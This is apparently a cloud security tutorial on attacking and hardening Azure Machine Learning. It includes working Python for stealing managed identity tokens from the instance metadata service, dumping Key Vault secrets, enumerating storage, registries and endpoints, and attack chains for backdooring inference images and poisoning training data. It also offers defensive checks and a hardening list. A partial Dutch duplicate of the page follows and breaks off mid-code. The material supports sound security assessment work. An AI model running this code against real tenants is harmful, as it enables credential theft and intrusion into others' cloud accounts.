Azure ML Attack Surface

Advanced | 13 min read | Updated 2026-03-13

Security assessment of Azure Machine Learning -- managed identity abuse, workspace security, attacks on compute instances, and endpoint vulnerabilities.

azure azure-ml cloud ml-platform

Azure ML Architecture

Azure Machine Learning organizes resources around workspaces. Each workspace is linked to an Azure Storage account, a Key Vault, a Container Registry, and Application Insights.

Attack Surface Map

Component	Identity	Storage	Network exposure
Compute instances	Managed identity/user	Workspace storage	VNet optional
Online endpoints	Managed identity	Model in ACR/Blob	Internet-facing
Batch endpoints	Managed identity	Blob input/output	VNet optional
Datastores	Workspace MI	Blob/ADLS/SQL	Workspace VNet
Pipelines	Pipeline MI	Blob artifacts	Workspace VNet

Attack Techniques

1. Managed Identity Abuse

Azure ML compute instances are assigned managed identities (system-assigned or user-assigned) that authenticate to Azure services without stored credentials. When these identities are overprivileged -- a common misconfiguration, because ML workflows touch many services -- compromising a single compute instance can give broad access across the Azure subscription.

The Instance Metadata Service (IMDS) at 169.254.169.254 is the primary token source. Unlike AWS IMDSv2, Azure IMDS requires no PUT-based session token exchange; a GET request carrying the `Metadata: true` header is enough, so any code running on the instance can harvest credentials.

import requests
 
# From inside an Azure ML compute instance
# Request a token for the managed identity
token_url = "http://169.254.169.254/metadata/identity/oauth2/token"
params = {
    "api-version": "2018-02-01",
    "resource": "https://management.azure.com/"
}
headers = {"Metadata": "true"}
 
resp = requests.get(token_url, params=params, headers=headers)
token = resp.json()["access_token"]
 
# Use the token to enumerate Azure resources
mgmt_url = "https://management.azure.com/subscriptions?api-version=2020-01-01"
subs = requests.get(mgmt_url, headers={"Authorization": f"Bearer {token}"}).json()
for sub in subs.get("value", []):
    print(f"Subscription: {sub['displayName']} ({sub['subscriptionId']})")
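Before using a harvested token, it helps to know which identity and audience it represents. The sketch below decodes the JWT payload locally, without verifying the signature, and picks out a few claims. The helper names `decode_jwt_claims` and `summarize_identity` are illustrative, and the claim list (including `xms_mirid`) is an assumption about what a managed identity token carries; absent claims simply come back as None.

```python
import base64
import json

def decode_jwt_claims(token: str) -> dict:
    """Return the payload claims of a JWT without verifying its signature."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected a three-part JWT")
    payload = parts[1]
    # base64url payloads omit padding; restore it before decoding
    payload += "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(payload))

def summarize_identity(claims: dict) -> dict:
    """Pick out claims that identify the principal, tenant, and audience."""
    wanted = ("aud", "oid", "appid", "tid", "exp", "xms_mirid")
    return {key: claims.get(key) for key in wanted}
```

Calling `summarize_identity(decode_jwt_claims(token))` on the token from the block above shows whether it is scoped to Azure Resource Manager and which principal ID to look for in role assignments.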

Lateral Movement via Managed Identity

Once you have a token, enumerate what the managed identity can reach. Common overprivilege patterns include Contributor at resource group scope (which grants management access to every resource in the group), Storage Blob Data Contributor on storage accounts that hold non-ML data, and Key Vault Secrets Officer across multiple vaults.

import requests
 
def enumerate_role_assignments(token, subscription_id):
    """List the role assignments the caller can read at subscription scope."""
    url = (
        f"https://management.azure.com/subscriptions/{subscription_id}"
        f"/providers/Microsoft.Authorization/roleAssignments"
        f"?api-version=2022-04-01"
    )
    headers = {"Authorization": f"Bearer {token}"}
    resp = requests.get(url, headers=headers).json()
 
    for assignment in resp.get("value", []):
        props = assignment["properties"]
        print(f"Role: {props['roleDefinitionId'].split('/')[-1]}")
        print(f"  Scope: {props['scope']}")
        print(f"  Principal: {props['principalId']}")
        print()
 
def get_token_for_resource(resource_url):
    """Request a managed identity token scoped to a specific resource."""
    resp = requests.get(
        "http://169.254.169.254/metadata/identity/oauth2/token",
        params={"api-version": "2018-02-01", "resource": resource_url},
        headers={"Metadata": "true"}
    )
    return resp.json()["access_token"]
 
# Request tokens for different Azure services
mgmt_token = get_token_for_resource("https://management.azure.com/")
storage_token = get_token_for_resource("https://storage.azure.com/")
vault_token = get_token_for_resource("https://vault.azure.net")
graph_token = get_token_for_resource("https://graph.microsoft.com/")
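The overprivilege patterns described above can be checked mechanically once role definition IDs have been resolved to role names. The following is a minimal sketch under that assumption: it takes (role name, scope) pairs and flags broad roles granted above single-resource scope. The `BROAD_ROLES` set and the function names are illustrative choices, not part of any Azure SDK.

```python
import re

# Roles treated as high risk in this sketch (an assumption; tune per engagement)
BROAD_ROLES = {
    "Owner", "Contributor", "User Access Administrator",
    "Storage Blob Data Contributor", "Key Vault Secrets Officer",
}

def scope_level(scope: str) -> str:
    """Classify an ARM scope string by how much of the hierarchy it covers."""
    if scope == "/" or scope.startswith("/providers/Microsoft.Management/managementGroups/"):
        return "management_group"
    if re.fullmatch(r"/subscriptions/[^/]+", scope, re.IGNORECASE):
        return "subscription"
    if re.fullmatch(r"/subscriptions/[^/]+/resourceGroups/[^/]+", scope, re.IGNORECASE):
        return "resource_group"
    return "resource"

def flag_overprivileged(assignments):
    """Return (role, scope, level) for broad roles granted above resource scope."""
    findings = []
    for role_name, scope in assignments:
        level = scope_level(scope.rstrip("/") or "/")
        if role_name in BROAD_ROLES and level != "resource":
            findings.append((role_name, scope, level))
    return findings
```

A Contributor assignment on a resource group is flagged, while the same role on a single storage account is not; whether that threshold is right depends on what else lives in the group.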

2. Workspace Datastore Enumeration

Azure ML workspaces connect to multiple datastores -- Azure Blob Storage, Azure Data Lake Storage (ADLS Gen2), Azure SQL Database, and Azure Database for PostgreSQL. Each datastore registration holds connection details and credentials that can be extracted.

from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential
 
ml_client = MLClient(
    DefaultAzureCredential(),
    subscription_id="...",
    resource_group_name="...",
    workspace_name="..."
)
 
# List all datastores
for ds in ml_client.datastores.list():
    print(f"Datastore: {ds.name} (type: {ds.type})")
    if hasattr(ds, 'account_name'):
        print(f"  Storage: {ds.account_name}/{ds.container_name}")
 
# List registered models
for model in ml_client.models.list():
    print(f"Model: {model.name} v{model.version}")

Deep Datastore Inspection

Beyond listing datastores, extract their connection credentials and examine which data is reachable. Datastores that use account keys (rather than identity-based access) keep those keys in the workspace Key Vault.

from itertools import islice

from azure.ai.ml import MLClient
from azure.ai.ml.entities import AzureBlobDatastore
from azure.identity import DefaultAzureCredential
from azure.storage.blob import BlobServiceClient

credential = DefaultAzureCredential()
ml_client = MLClient(
    credential,
    subscription_id="...",
    resource_group_name="...",
    workspace_name="..."
)

# Get detailed datastore info, including the credential type
for ds in ml_client.datastores.list():
    detail = ml_client.datastores.get(ds.name)
    print(f"\nDatastore: {detail.name}")
    print(f"  Type: {detail.type}")

    # Check the credential type -- account key vs. identity-based
    if hasattr(detail, 'credentials'):
        cred_type = type(detail.credentials).__name__
        print(f"  Credential type: {cred_type}")

    # For blob datastores, try to list a small sample of the contents
    if isinstance(detail, AzureBlobDatastore):
        blob_client = BlobServiceClient(
            f"https://{detail.account_name}.blob.core.windows.net",
            credential=credential
        )
        container = blob_client.get_container_client(detail.container_name)
        print("  Sample contents:")
        # islice stops after five blobs; results_per_page only sets the page size
        for blob in islice(container.list_blobs(), 5):
            print(f"    {blob.name} ({blob.size} bytes)")

# Enumerate environments (container images used for training/inference)
for env in ml_client.environments.list():
    print(f"Environment: {env.name} v{env.version}")
    if hasattr(env, 'image'):
        print(f"  Image: {env.image}")

# List compute targets -- potential pivot points
for compute in ml_client.compute.list():
    # Not every compute type exposes a runtime state
    state = getattr(compute, "state", "n/a")
    print(f"Compute: {compute.name} (type: {compute.type}, state: {state})")
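The credential type printed by the inspection code is the main signal for how a datastore should be prioritized. The sketch below ranks datastores by that class name. The class names in `CREDENTIAL_RISK` are assumptions about what `type(detail.credentials).__name__` yields in the azure-ai-ml SDK, and the severity labels are this sketch's own scale; anything unrecognized is reported as unknown rather than guessed.

```python
# Keys are assumed credential class names; values are (severity, reason).
CREDENTIAL_RISK = {
    "AccountKeyConfiguration": ("high", "account key grants full access to the storage account"),
    "SasTokenConfiguration": ("medium", "SAS token is a bearer secret with its own scope and expiry"),
    "ServicePrincipalConfiguration": ("medium", "client secret can be reused outside the workspace"),
    "NoneCredentialConfiguration": ("low", "identity-based access; no stored secret"),
}

SEVERITY_ORDER = {"high": 0, "medium": 1, "unknown": 2, "low": 3}

def rate_datastore(name: str, cred_type: str) -> dict:
    """Attach a severity and reason to one datastore based on its credential class."""
    severity, reason = CREDENTIAL_RISK.get(
        cred_type, ("unknown", "unrecognized credential type; review manually")
    )
    return {"datastore": name, "credential_type": cred_type,
            "severity": severity, "reason": reason}

def rank_datastores(pairs):
    """Rate (name, credential class name) pairs and sort the riskiest first."""
    rated = [rate_datastore(name, cred_type) for name, cred_type in pairs]
    return sorted(rated, key=lambda row: SEVERITY_ORDER[row["severity"]])
```

Feeding it the (name, credential type) pairs collected in the loop above puts account-key datastores at the top of the review list.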

3. Endpoint Authentication Testing

Azure ML online endpoints support key-based authentication (a static API key) and token-based authentication (Azure ML tokens or Azure AD tokens). Misconfigurations include endpoints deployed with authentication disabled, keys that are never rotated, and overly permissive CORS policies.

import requests
 
# Test whether the endpoint requires authentication
endpoint_url = "https://my-endpoint.westus2.inference.ml.azure.com/score"

# Try unauthenticated access
resp = requests.post(endpoint_url, json={"data": [[1,2,3]]})
print(f"No auth: {resp.status_code}")

# Try a stolen or guessed key
resp = requests.post(
    endpoint_url,
    json={"data": [[1,2,3]]},
    headers={"Authorization": "Bearer <key>"}
)
print(f"With key: {resp.status_code}")

Advanced Endpoint Probing

import requests

def probe_endpoint(endpoint_url, keys=None):
    """Comprehensive security assessment of an endpoint."""
    results = {}

    # Test unauthenticated access
    results["no_auth"] = requests.post(
        endpoint_url, json={"data": [[1,2,3]]}
    ).status_code

    # Send OPTIONS to check CORS
    results["cors"] = requests.options(endpoint_url).headers.get(
        "Access-Control-Allow-Origin", "not set"
    )

    # Test the Swagger/OpenAPI route (often exposed)
    swagger_url = endpoint_url.replace("/score", "/swagger.json")
    swagger_resp = requests.get(swagger_url)
    results["swagger_exposed"] = swagger_resp.status_code == 200
    if results["swagger_exposed"]:
        results["swagger_paths"] = list(swagger_resp.json().get("paths", {}).keys())

    # Test the health route
    health_url = endpoint_url.replace("/score", "/")
    results["health"] = requests.get(health_url).status_code

    # Test for verbose error messages (information disclosure)
    headers = {"Content-Type": "application/json"}
    if keys:
        # Send the Authorization header only when a key is available
        headers["Authorization"] = f"Bearer {keys[0]}"
    malformed_resp = requests.post(endpoint_url, data="not json", headers=headers)
    results["error_verbosity"] = len(malformed_resp.text)
    results["error_sample"] = malformed_resp.text[:500]

    return results
 
# Enumerate all endpoints and inspect each one
from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential
 
ml_client = MLClient(
    DefaultAzureCredential(),
    subscription_id="...",
    resource_group_name="...",
    workspace_name="..."
)
 
for endpoint in ml_client.online_endpoints.list():
    print(f"\n=== Endpoint: {endpoint.name} ===")
    print(f"  Auth mode: {endpoint.auth_mode}")
    print(f"  Scoring URI: {endpoint.scoring_uri}")
 
    # Retrieve the endpoint keys when key-based auth is in use
    if endpoint.auth_mode == "key":
        keys = ml_client.online_endpoints.get_keys(endpoint.name)
        print(f"  Primary key: {keys.primary_key[:10]}...")
        print(f"  Secondary key: {keys.secondary_key[:10]}...")
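The dictionary returned by `probe_endpoint` is raw data; turning it into findings is a separate step. The sketch below is one way to do that, assuming the result keys used above (`no_auth`, `cors`, `swagger_exposed`, `error_sample`). The severity labels and the stack-trace heuristic are illustrative assumptions.

```python
def triage_probe_results(results: dict) -> list:
    """Convert probe_endpoint output into (severity, message) findings."""
    findings = []
    if results.get("no_auth") == 200:
        findings.append(("critical", "scoring route answered without credentials"))
    if results.get("cors") == "*":
        findings.append(("medium", "wildcard Access-Control-Allow-Origin"))
    if results.get("swagger_exposed"):
        findings.append(("low", "OpenAPI description readable without credentials"))
    sample = results.get("error_sample", "")
    # Heuristic: Python tracebacks contain these markers
    if "Traceback" in sample or 'File "' in sample:
        findings.append(("medium", "error body leaks a Python stack trace"))
    return findings
```

An endpoint that returns 401 or 403 to the unauthenticated request and a terse error body yields an empty list.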

4. Key Vault Secret Extraction

Every Azure ML workspace is created with an associated Azure Key Vault. This vault stores datastore credentials, API keys, custom secrets set by data scientists, and connection strings. The workspace managed identity typically has broad access to this vault, which makes it a high-value target after an initial compute compromise.

from azure.keyvault.secrets import SecretClient
from azure.identity import DefaultAzureCredential
 
# Azure ML workspaces have an associated Key Vault
kv_client = SecretClient(
    vault_url="https://my-workspace-kv.vault.azure.net/",
    credential=DefaultAzureCredential()
)
 
# List and read secrets
for secret in kv_client.list_properties_of_secrets():
    print(f"Secret: {secret.name}")
    value = kv_client.get_secret(secret.name)
    print(f"  Value: {value.value[:50]}...")

Comprehensive Key Vault Enumeration

from azure.keyvault.secrets import SecretClient
from azure.keyvault.keys import KeyClient
from azure.keyvault.certificates import CertificateClient
from azure.identity import DefaultAzureCredential
 
credential = DefaultAzureCredential()
vault_url = "https://my-workspace-kv.vault.azure.net/"
 
# Enumerate secrets
secret_client = SecretClient(vault_url=vault_url, credential=credential)
print("=== Secrets ===")
for secret in secret_client.list_properties_of_secrets():
    print(f"  {secret.name} (enabled: {secret.enabled}, "
          f"created: {secret.created_on})")
    # Categorize by naming convention
    if any(kw in secret.name.lower() for kw in
           ['connection', 'storage', 'sql', 'password', 'key', 'token']):
        print(f"    [HIGH VALUE] Likely credential or connection string")
 
# Enumerate keys (used for encryption and signing)
key_client = KeyClient(vault_url=vault_url, credential=credential)
print("\n=== Keys ===")
for key_props in key_client.list_properties_of_keys():
    # The listing returns properties only; fetch the key for its type and operations
    key = key_client.get_key(key_props.name)
    print(f"  {key.name} (type: {key.key_type}, ops: {key.key_operations})")

# Enumerate certificates
cert_client = CertificateClient(vault_url=vault_url, credential=credential)
print("\n=== Certificates ===")
for cert in cert_client.list_properties_of_certificates():
    print(f"  {cert.name} (expires: {cert.expires_on})")
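Printing secret prefixes, as the extraction snippet above does, copies live credential material into terminal history and reports. A minimal alternative, assuming a SHA-256 fingerprint is acceptable evidence for the engagement, records only the length and a short hash prefix. The function name `fingerprint_secret` is illustrative.

```python
import hashlib

def fingerprint_secret(name: str, value: str) -> dict:
    """Describe a secret by length and hash prefix without exposing its value."""
    digest = hashlib.sha256(value.encode("utf-8")).hexdigest()
    return {"name": name, "length": len(value), "sha256_prefix": digest[:12]}
```

The vault owner can recompute the same prefix to confirm which secret version was read, and the report never contains the value itself.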

5. Container Registry Abuse

Azure ML workspaces use Azure Container Registry (ACR) to store Docker images for training and inference environments. Compromised ACR access enables model supply-chain attacks -- replacing legitimate inference images with backdoored versions.

import requests

def enumerate_acr(acr_name, token):
    """Enumerate repositories and images in Azure Container Registry."""
    service = f"{acr_name}.azurecr.io"
    acr_url = f"https://{service}"

    # Exchange the Azure AD (ARM-audience) token for an ACR refresh token
    refresh_token = requests.post(f"{acr_url}/oauth2/exchange", data={
        "grant_type": "access_token",
        "service": service,
        "access_token": token
    }).json()["refresh_token"]

    def bearer(scope):
        """Trade the refresh token for an ACR access token limited to one scope."""
        resp = requests.post(f"{acr_url}/oauth2/token", data={
            "grant_type": "refresh_token",
            "service": service,
            "scope": scope,
            "refresh_token": refresh_token
        })
        return {"Authorization": f"Bearer {resp.json()['access_token']}"}

    # List repositories
    repos = requests.get(
        f"{acr_url}/v2/_catalog",
        headers=bearer("registry:catalog:*")
    ).json()

    for repo in repos.get("repositories", []):
        print(f"Repository: {repo}")
        repo_headers = bearer(f"repository:{repo}:pull")
        # List tags
        tags = requests.get(
            f"{acr_url}/v2/{repo}/tags/list",
            headers=repo_headers
        ).json()
        for tag in (tags.get("tags") or [])[:5]:
            print(f"  Tag: {tag}")
            # Fetch the manifest for image analysis
            manifest = requests.get(
                f"{acr_url}/v2/{repo}/manifests/{tag}",
                headers={
                    **repo_headers,
                    "Accept": "application/vnd.docker.distribution.manifest.v2+json"
                }
            ).json()
            print(f"  Layers: {len(manifest.get('layers', []))}")

6. Network Isolation Assessment

Azure ML supports VNet integration, but many deployments run the default configuration without network isolation. Even with VNet integration enabled, misconfigured network security groups (NSGs) and missing private endpoints create attack paths.

import requests
 
def assess_network_isolation(token, subscription_id, resource_group, workspace_name):
    """Assess whether an Azure ML workspace has proper network isolation."""
    base_url = "https://management.azure.com"
    headers = {"Authorization": f"Bearer {token}"}
 
    # Fetch workspace details
    ws_url = (
        f"{base_url}/subscriptions/{subscription_id}"
        f"/resourceGroups/{resource_group}"
        f"/providers/Microsoft.MachineLearningServices"
        f"/workspaces/{workspace_name}"
        f"?api-version=2023-10-01"
    )
    ws = requests.get(ws_url, headers=headers).json()
 
    props = ws.get("properties", {})
    results = {
        "public_network_access": props.get("publicNetworkAccess", "Unknown"),
        "private_endpoints": [],
        "managed_network": props.get("managedNetwork", {}),
    }
 
    # Check for private endpoint connections
    pe_connections = props.get("privateEndpointConnections", [])
    for pe in pe_connections:
        pe_props = pe.get("properties", {})
        results["private_endpoints"].append({
            "name": pe.get("name"),
            "status": pe_props.get("privateLinkServiceConnectionState", {}).get("status")
        })
 
    # Assess risk
    if results["public_network_access"] == "Enabled":
        print("[CRITICAL] Public network access is enabled")
    if not results["private_endpoints"]:
        print("[HIGH] No private endpoints configured")
 
    return results
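The assessment above collects the `managedNetwork` block but never evaluates it. The sketch below grades a workspace `properties` dictionary offline, including the managed network isolation mode, so it can be run against saved ARM responses. The function name, the severity scale, and the decision to treat any value other than `Disabled` for `publicNetworkAccess` as a finding are assumptions of this sketch.

```python
def grade_network_posture(props: dict) -> list:
    """Turn workspace properties into (severity, message) findings."""
    findings = []
    if props.get("publicNetworkAccess", "Unknown") != "Disabled":
        findings.append(("critical", "public network access is not disabled"))

    # Count only private endpoint connections that have been approved
    approved = [
        pe for pe in props.get("privateEndpointConnections", [])
        if pe.get("properties", {})
             .get("privateLinkServiceConnectionState", {})
             .get("status") == "Approved"
    ]
    if not approved:
        findings.append(("high", "no approved private endpoint connection"))

    mode = (props.get("managedNetwork") or {}).get("isolationMode", "Disabled")
    if mode == "Disabled":
        findings.append(("medium", "managed network isolation is disabled"))
    elif mode == "AllowInternetOutbound":
        findings.append(("low", "managed network allows all internet outbound traffic"))
    return findings
```

Passing `ws.get("properties", {})` from the function above returns an empty list only when public access is disabled, at least one private endpoint is approved, and outbound traffic is restricted to approved destinations.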

Defensive Assessment Checklist

When assessing Azure ML security posture, verify these controls:

Control area	What to check	MITRE ATLAS reference
Identity	Managed identity scope, conditional access policies, RBAC assignments	AML.TA0000 (ML Model Access)
Network	VNet integration, private endpoints, NSG rules, public endpoint exposure	AML.T0006 (Active Scanning)
Data	Storage encryption, datastore credential type, public blob access	AML.TA0009 (Collection)
Compute	Instance isolation, SSH access, idle shutdown, patching	AML.T0044 (Full ML Model Access)
Registry	ACR access controls, image signing, vulnerability scanning	AML.T0018 (Backdoor ML Model)
Secrets	Key Vault access policies, secret rotation, soft delete enabled	AML.TA0009 (Collection)
Monitoring	Diagnostic settings, Azure Sentinel integration, audit logs	AML.TA0007 (Defense Evasion)

Recommended Hardening

Use user-assigned managed identities with least-privilege RBAC instead of system-assigned identities with broad scope.
Enable VNet integration with private endpoints for the workspace, storage accounts, Key Vault, and ACR.
Set publicNetworkAccess to Disabled on all workspace resources.
Use identity-based access (credential passthrough) for datastores instead of storing account keys in Key Vault.
Enable ACR content trust and scan images for vulnerabilities before deploying them.
Enforce auth_mode: aad_token on endpoints instead of key-based authentication.
Enable Azure Sentinel with the ML workspace diagnostic settings for security monitoring.
Rotate endpoint keys on a regular schedule and after any suspected compromise.

Common Attack Chains

Real-world Azure ML engagements typically combine multiple techniques. These are common attack chains, ordered by impact:

Chain 1: Compute to Subscription Takeover

1. Initial access via malicious notebook or compromised data scientist credentials
2. Extract managed identity token from IMDS (169.254.169.254)
3. Enumerate role assignments to discover overprivileged identity
4. Access Key Vault secrets (storage keys, API credentials, connection strings)
5. Use storage keys to access blob containers across the subscription
6. Discover secrets in non-ML Key Vaults shared by the managed identity
7. Pivot to databases, APIs, or other services using extracted credentials

Chain 2: Model Supply-Chain Attack

1. Enumerate ACR repositories via workspace managed identity
2. Identify inference container images used by production endpoints
3. Pull the target image, inject a backdoor (data exfiltration layer)
4. Push the modified image with the same tag (no immutability)
5. Trigger endpoint redeployment (or wait for next scheduled update)
6. Backdoored model now exfiltrates inference data to attacker C2
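Step 4 of this chain works because a tag can be silently repointed to a different manifest. One way to detect that, sketched below, is to snapshot the digest behind each tag and compare snapshots over time. The snapshot format ("repo:tag" mapped to a digest string) is an assumption of this sketch; the digest itself can be taken from the `Docker-Content-Digest` response header that registries return on manifest requests.

```python
def detect_tag_drift(baseline: dict, current: dict) -> dict:
    """Compare {"repo:tag": digest} snapshots and report what changed."""
    shared = baseline.keys() & current.keys()
    moved = {
        ref: (baseline[ref], current[ref])
        for ref in shared
        if baseline[ref] != current[ref]
    }
    return {
        "moved": moved,                                        # same tag, new digest
        "added": sorted(current.keys() - baseline.keys()),     # tags not seen before
        "removed": sorted(baseline.keys() - current.keys()),   # tags that disappeared
    }
```

A non-empty `moved` entry for an image that production endpoints deploy is the signal to investigate, since legitimate rebuilds should normally arrive under a new tag.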

Chain 3: Training Pipeline Manipulation

1. Access workspace via compromised compute instance
2. Enumerate datastores and identify training data locations
3. Modify training data in blob storage to inject backdoor examples
4. Wait for scheduled retraining pipeline to execute
5. Backdoored model is registered in model registry
6. Backdoored model is deployed to production endpoint
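This chain depends on the retraining pipeline trusting whatever sits in blob storage. A minimal countermeasure, sketched below under the assumption that a trusted manifest of file hashes is kept somewhere the compute identity cannot write, is to verify the training files against that manifest before each run. The function names and the in-memory `blobs` mapping (name to bytes) are illustrative.

```python
import hashlib

def build_manifest(blobs: dict) -> dict:
    """Map each blob name to the SHA-256 hex digest of its bytes."""
    return {name: hashlib.sha256(data).hexdigest() for name, data in blobs.items()}

def verify_training_data(trusted: dict, blobs: dict) -> list:
    """Return a list of problems; an empty list means the data matches the manifest."""
    observed = build_manifest(blobs)
    problems = []
    for name in sorted(trusted.keys() | observed.keys()):
        if name not in observed:
            problems.append(f"missing: {name}")
        elif name not in trusted:
            problems.append(f"unexpected: {name}")
        elif trusted[name] != observed[name]:
            problems.append(f"modified: {name}")
    return problems
```

A pipeline step could refuse to start training whenever the returned list is non-empty, which turns step 3 of the chain into a visible failure instead of a silent backdoor.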

MITRE ATLAS Mapping for Azure ML Attacks

Attack technique	ATLAS ID	Azure ML-specific context
IMDS managed identity token extraction	AML.TA0004 (Initial Access)	Workspace MI with broad RBAC scope
Datastore enumeration	AML.T0000 (Search for Victim's Data)	Registered datastores reveal all connected storage
Endpoint probing	AML.T0006 (Active Scanning)	Endpoints may use key-based auth without rotation
Model extraction via endpoint	AML.T0024 (Model Extraction)	Online endpoints serving model predictions
ACR image tampering	AML.T0018 (Backdoor ML Model)	Replace training/inference images in ACR
Key Vault lateral movement	AML.TA0009 (Collection)	Workspace Key Vault stores cross-service secrets
Training data poisoning via blob	AML.T0020 (Poison Training Data)	Modify training data in connected blob storage

Cross-Platform Comparison

Attack vector	Azure ML	AWS SageMaker	GCP Vertex AI
Credential source	IMDS (managed identity)	IMDS (IAM role)	Metadata server (SA token)
Primary storage	Blob Storage / ADLS	S3	GCS
Container registry	Azure Container Registry	Amazon ECR	Artifact Registry
Secret management	Key Vault (auto-created)	Secrets Manager / SSM	Secret Manager
Network isolation	VNet + Private Endpoints	VPC + VPC Endpoints	VPC-SC + Private Google Access
Biggest risk	Key Vault cross-service exposure	IAM role overprivilege	Service account `Editor` role

Related Topics

Cloud AI Infrastructure -- cross-platform overview
GCP Vertex AI -- GCP comparison
AWS SageMaker -- AWS comparison



Azure ML-aanvalsoppervlak

Gevorderd13 min lezenBijgewerkt op 2026-03-13

Beveiligingsbeoordeling van Azure Machine Learning -- misbruik van managed identity, workspace-beveiliging, aanvallen op compute-instances en endpoint-kwetsbaarheden.

azure azure-ml cloud ml-platform

Azure ML-architectuur

Azure Machine Learning organiseert resources rond workspaces. Elke workspace verbindt met Azure Storage, Key Vault, Container Registry en Application Insights.

Kaart van het aanvalsoppervlak

Component	Identiteit	Opslag	Netwerkblootstelling
Compute-instances	Managed Identity/User	Workspace-opslag	VNet optioneel
Online-endpoints	Managed Identity	Model in ACR/Blob	Internetgericht
Batch-endpoints	Managed Identity	Blob input/output	VNet optioneel
Datastores	Workspace MI	Blob/ADLS/SQL	Workspace VNet
Pipelines	Pipeline MI	Blob-artefacten	Workspace VNet

Aanvalstechnieken

1. Misbruik van managed identity

import requests
 
# Vanuit een Azure ML-compute-instance
# Verkrijg een token voor de managed identity
token_url = "http://169.254.169.254/metadata/identity/oauth2/token"
params = {
    "api-version": "2018-02-01",
    "resource": "https://management.azure.com/"
}
headers = {"Metadata": "true"}
 
resp = requests.get(token_url, params=params, headers=headers)
token = resp.json()["access_token"]
 
# Gebruik het token om Azure-resources te inventariseren
mgmt_url = "https://management.azure.com/subscriptions?api-version=2020-01-01"
subs = requests.get(mgmt_url, headers={"Authorization": f"Bearer {token}"}).json()
for sub in subs.get("value", []):
    print(f"Subscription: {sub['displayName']} ({sub['subscriptionId']})")

Laterale beweging via managed identity

import requests
 
def enumerate_role_assignments(token, subscription_id):
    """Inventariseer alle role assignments voor de huidige identiteit."""
    url = (
        f"https://management.azure.com/subscriptions/{subscription_id}"
        f"/providers/Microsoft.Authorization/roleAssignments"
        f"?api-version=2022-04-01"
    )
    headers = {"Authorization": f"Bearer {token}"}
    resp = requests.get(url, headers=headers).json()
 
    for assignment in resp.get("value", []):
        props = assignment["properties"]
        print(f"Role: {props['roleDefinitionId'].split('/')[-1]}")
        print(f"  Scope: {props['scope']}")
        print(f"  Principal: {props['principalId']}")
        print()
 
def get_token_for_resource(resource_url):
    """Verkrijg een managed-identity-token gericht op een specifieke resource."""
    resp = requests.get(
        "http://169.254.169.254/metadata/identity/oauth2/token",
        params={"api-version": "2018-02-01", "resource": resource_url},
        headers={"Metadata": "true"}
    )
    return resp.json()["access_token"]
 
# Verkrijg tokens voor verschillende Azure-services
mgmt_token = get_token_for_resource("https://management.azure.com/")
storage_token = get_token_for_resource("https://storage.azure.com/")
vault_token = get_token_for_resource("https://vault.azure.net")
graph_token = get_token_for_resource("https://graph.microsoft.com/")

2. Inventarisatie van workspace-datastores

from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential
 
ml_client = MLClient(
    DefaultAzureCredential(),
    subscription_id="...",
    resource_group_name="...",
    workspace_name="..."
)
 
# Lijst alle datastores op
for ds in ml_client.datastores.list():
    print(f"Datastore: {ds.name} (type: {ds.type})")
    if hasattr(ds, 'account_name'):
        print(f"  Storage: {ds.account_name}/{ds.container_name}")
 
# Lijst geregistreerde modellen op
for model in ml_client.models.list():
    print(f"Model: {model.name} v{model.version}")

Diepgaande datastore-inspectie

from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential
 
ml_client = MLClient(
    DefaultAzureCredential(),
    subscription_id="...",
    resource_group_name="...",
    workspace_name="..."
)
 
# Verkrijg gedetailleerde datastore-info inclusief het credentialtype
for ds in ml_client.datastores.list():
    detail = ml_client.datastores.get(ds.name)
    print(f"\nDatastore: {detail.name}")
    print(f"  Type: {detail.type}")
 
    # Controleer credentialtype -- account_key vs identity-gebaseerd
    if hasattr(detail, 'credentials'):
        cred_type = type(detail.credentials).__name__
        print(f"  Credential type: {cred_type}")
 
    # Probeer bij blob-datastores de inhoud op te sommen
    if detail.type == "azure_blob":
        from azure.storage.blob import BlobServiceClient
        blob_client = BlobServiceClient(
            f"https://{detail.account_name}.blob.core.windows.net",
            credential=DefaultAzureCredential()
        )
        container = blob_client.get_container_client(detail.container_name)
        print(f"  Sample contents:")
        for blob in container.list_blobs(results_per_page=5):
            print(f"    {blob.name} ({blob.size} bytes)")
 
# Inventariseer environments (containerimages gebruikt voor training/inference)
for env in ml_client.environments.list():
    print(f"Environment: {env.name} v{env.version}")
    if hasattr(env, 'image'):
        print(f"  Image: {env.image}")
 
# Lijst compute targets op -- mogelijke pivotpunten
for compute in ml_client.compute.list():
    print(f"Compute: {compute.name} (type: {compute.type}, state: {compute.state})")

3. Endpoint-authenticatie testen

import requests
 
# Test of het endpoint authenticatie vereist
endpoint_url = "https://my-endpoint.westus2.inference.ml.azure.com/score"
 
# Probeer ongeauthenticeerde toegang
resp = requests.post(endpoint_url, json={"data": [[1,2,3]]})
print(f"No auth: {resp.status_code}")
 
# Probeer met een gestolen/geraden sleutel
resp = requests.post(
    endpoint_url,
    json={"data": [[1,2,3]]},
    headers={"Authorization": "Bearer <key>"}
)
print(f"With key: {resp.status_code}")

Geavanceerd endpoint-onderzoek

import requests
import json
 
def probe_endpoint(endpoint_url, keys=None):
    """Uitgebreide beveiligingsbeoordeling van een endpoint."""
    results = {}
 
    # Test authenticatiemodi
    results["no_auth"] = requests.post(
        endpoint_url, json={"data": [[1,2,3]]}
    ).status_code
 
    # Test met OPTIONS om CORS te controleren
    results["cors"] = requests.options(endpoint_url).headers.get(
        "Access-Control-Allow-Origin", "not set"
    )
 
    # Test Swagger/OpenAPI-endpoint (vaak blootgesteld)
    swagger_url = endpoint_url.replace("/score", "/swagger.json")
    swagger_resp = requests.get(swagger_url)
    results["swagger_exposed"] = swagger_resp.status_code == 200
    if results["swagger_exposed"]:
        results["swagger_paths"] = list(swagger_resp.json().get("paths", {}).keys())
 
    # Test health-endpoint
    health_url = endpoint_url.replace("/score", "/")
    results["health"] = requests.get(health_url).status_code
 
    # Test op uitgebreide foutmeldingen (informatieblootstelling)
    malformed_resp = requests.post(
        endpoint_url,
        data="not json",
        headers={"Content-Type": "application/json",
                 "Authorization": f"Bearer {keys[0]}" if keys else ""}
    )
    results["error_verbosity"] = len(malformed_resp.text)
    results["error_sample"] = malformed_resp.text[:500]
 
    return results
 
# Inventariseer alle endpoints en onderzoek elk
from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential
 
